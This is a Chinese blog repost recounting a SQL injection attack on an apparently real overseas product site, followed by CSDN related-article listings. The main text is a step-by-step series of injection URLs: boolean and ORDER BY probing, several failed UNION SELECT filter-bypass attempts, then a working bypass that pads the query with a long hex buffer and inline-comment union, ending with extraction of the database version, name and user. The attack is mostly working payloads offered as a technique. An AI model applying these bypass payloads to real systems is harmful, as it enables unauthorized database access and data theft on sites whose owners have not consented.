变态方法突破过滤UNION+SELECT继续注入

最新推荐文章于 2024-03-12 16:39:52 发布
最新推荐文章于 2024-03-12 16:39:52 发布
阅读量1.1w 收藏 15
点赞数 4
分类专栏: 安全

http://www.jb51.net/article/48933.htm


  前几今天遇到一个bt 的老外注射点:

    //*ps 此点目前流行的注射工具射不 *//

    http:// /index.php?content=more_product&id=17

    http:// /index.php?content=more_product&id=17 and 1=1 正常

    http:// /index.php?content=more_product&id=17 and 1=2 报错

    http:// /index.php?content=more_product&id=17 order by 6 正常

    http:// /index.php?content=more_product&id=17 order by 7 错误

    继续按照常规的手法注射:

    http:// /index.php?content=more_product&id=-17+UNION+SELECT+1,2,

    3,4,5,6--

    错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过

    http:// /index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/

    /**//*!sElEcT*//**//**/1,2,3,4,5,6--

    悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…

    http:// /index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n

    *//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--

    http:// /index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca

    t(s,e,l,e,c,t)+all+1,2,3,4,5,6--

    悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内

    的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑

    客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

    于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-

    靠,老外果然牛B 那么继续射

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u

    ser()),3,4,5,6--+-

    成功得到系统版本、当前数据库用户、用户名


ncafei
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
MySQL中UNIONUNION ALL的基本使用方法
12-15
在数据库中,UNIONUNION ALL关键字都是将两个结果集合并为一个,但这两者从使用和效率上来说都有所不同。 MySQL中的UNION UNION在进行表链接后会筛选掉重复的记录,所以在表链接后会对所产生的结果集进行排序运算,删除重复的记录再返回结果。实际大部分应用中是不会产生重复的记录,最常见的是过程表与历史表UNION。如: select * from gc_dfys union select * from ls_jg_dfys 这个SQL在运行时先取出两个表的结果,再用排序空间进行排序删除重复的记录,最后返回结果集,如果表数据量大的话可能会导致用磁盘进行排序。 MySQL中的UN
sql注入过滤关键字(union select等等)
没事我溜达
03-15 8243
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
浅谈SQL注入中的-1‘ union select 1,2,3#
dzqxwzoe的博客
03-12 928
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库的SQL注入语句。
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 882
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
过滤union,table,information和各种库名时查询列名
qq_31028197的博客
05-18 288
过滤了information, innodb_index_stats,union等的条件下查询列名
sql注入中的union select 1,2,3....
热门推荐
yy
03-15 2万+
在sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 8620
sql注入中的union联合查询,union select 1,2,3
sql注入select/union select
@一只躺平的猪@的博客
07-14 2764
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
SQL UNION 操作符
daobuxinzi的博客
10-26 445
SQL UNION 操作符合并两个或多个 SELECT 语句的结果。 SQL UNION 操作符 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 请注意,UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每个 SELECT 语句中的列的顺序必须相同。 SQL UNION 语法 SELECTcolumn_name(s)FROMtable1 UNION SELECTcolumn_name(s)FROMtable2; ...
如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集
Vin_c° 的专栏
05-18 2342
文章目录一、组合查询二、创建组合查询2.1 使用 UNION2.2 UNION 规则2.3 包含或取消重复的行2.4 对组合查询结果排序三、小结 本文介绍如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集。使用 UNION 可极大地简化复杂的 WHERE 子句,简化从多个表中检索数据的工作。 一、组合查询 多数 SQL 查询只包含从一个或多个表中返回数据的单条 SELECT 语句。但是,SQL 也允许执行多个查询(多条 SELECT 语句),并将结果作为一个查询结果集返回。 这些
MySQL中union和order by同时使用的实现方法
01-21
MySQL中union和order by是可以一起使用的,但是在使用中需要注意一些小问题,下面通过例子来说明。首先看下面的t1表。 1、如果直接用如下sql语句是会报错:Incorrect usage of UNION and ORDER BY。 SELECT * FROM ...
输入值/表单提交参数过滤有效防止sql注入方法
01-21
输入值/表单提交参数过滤,防止sql注入或非法攻击的方法: 复制代码 代码如下: /** * 过滤sql与php文件操作的关键字 * @param string $string * @return string * @author zyb <zyb> */ private function filter_...
sqlserver Union和SQL Union All使用方法
12-15
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。 SQL UNION 语法SELECT...
C++11中union的使用方法示例
01-01
通过关键字union进行定义,一个union可以有多个数据成员。例如 union Token{ char cval; int ival; double dval; }; c++11中union除了继承c语言的数据共享内存之外,行为上越来越像一个类,比如成员默认是public...
2014年311教育学专业基础综合答案解析.pdf
04-24
教育学考研,考研真题,全国硕士研究生统一考试教育学专业基础综合真题及解析,311历年真题,参考答案,答案解析。教育学统考。
大语言模型安全测试方法
04-24
4月16日联合国日内瓦总部万国宫,由世界数字技术院(WDTA)与云安全联盟大中华区(CSA GCR)联合主办第27届联合国科技大会AI边会上,世界数字技术院(WDTA)发布了两项具有重要意义的国际标准:“生成式人工智能应用安全测试标准”和“大语言模型安全测试方法”。这是国际组织首次在生成式AI应用安全、大模型安全领域发布国际标准,为业界提供了统一的测试框架,标准的发布将对人工智能领域产生深远影响,推动人工智能技术的安全、可靠发展。 这两大标准由云安全联盟大中华区研究院副院长黄连金带领的专家团队编制而成,他们来自CSA大中华区、OpenAI、蚂蚁集团、谷歌、微软、亚马逊、英伟达、OPPO、科大讯飞、百度、腾讯、加州大学伯克利分校、芝加哥大学、香港科技大学等数十家单位,体现了业界的广泛协作与集体智慧。 云安全联盟大中华区主席、世界数字技术院执行理事长李雨航院士发布时介绍,“生成式人工智能应用安全测试标准”为测试和验证生成式AI应用的安全性提供了一个框架,特别是那些使用大语言模型构建的应用程序。它定义了人工智能应用程序架构每一层的测试和验证范围,确保AI应用各个方面都经过严格的安全性和合规性
基于ssm电商网站的设计与实现(部署视频)_kaic.zip
04-24
目 录 目 录 1 绪论 1.1 研究背景 1.2 目的和意义 1.3 论文结构安排 2 相关技术 2.1 SSM框架介绍 2.2 B/S结构介绍 2.3 MYSQL数据库介绍 3 系统分析 3.1 系统可行性分析 3.1.1 技术可行性分析 3.1.2 经济可行性分析 3.1.3 运行可行性分析 3.2 系统性能分析 3.2.1 易用性指标 3.2.2 可扩展性指标 3.2.3 健壮性指标 3.2.4 安全性指标 3.3 系统流程分析 3.3.1 操作流程分析 3.3.2 登录流程分析 3.3.3 信息添加流程分析 3.3.4 信息删除流程分析 4 系统设计 4.1 系统概要设计 4.2 系统功能结构设计 4.3 数据库设计 4.3.1 数据库E-R图设计 4.3.2 数据库表结构设计 5 系统实现 5.1用户信息管理 5.2 商品信息管理 5.3商品分类管理 5.1商品资讯管理 6 系统测试 6.1 系统测试的特点  6.2 系统功能测试 6.2.1 登录功能测试 6.2.2 添加类别功能测试 6.3 测试结果分析 结 论 致 谢 参考文献
Comfast CF-924AC V3无线网卡驱动
最新发布
04-24
https://editor.csdn.net/md/?articleId=137978326文章对应USB 1300M无线网卡驱动,使用方式请参考博文。本驱动为博文对应的RDK X3平台所用,其它平台根据博文链接下载源码编译。
sql注入过滤select
07-28
在SQL注入中,过滤select关键字是常见的安全措施之一。然而,有一些方法可以绕过这种过滤。一种方法是在过滤过滤的关键词前面加上URL编码的空字节%00。这是因为在C/C++中,空字节代表语句的结束,而SQL语句对空...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值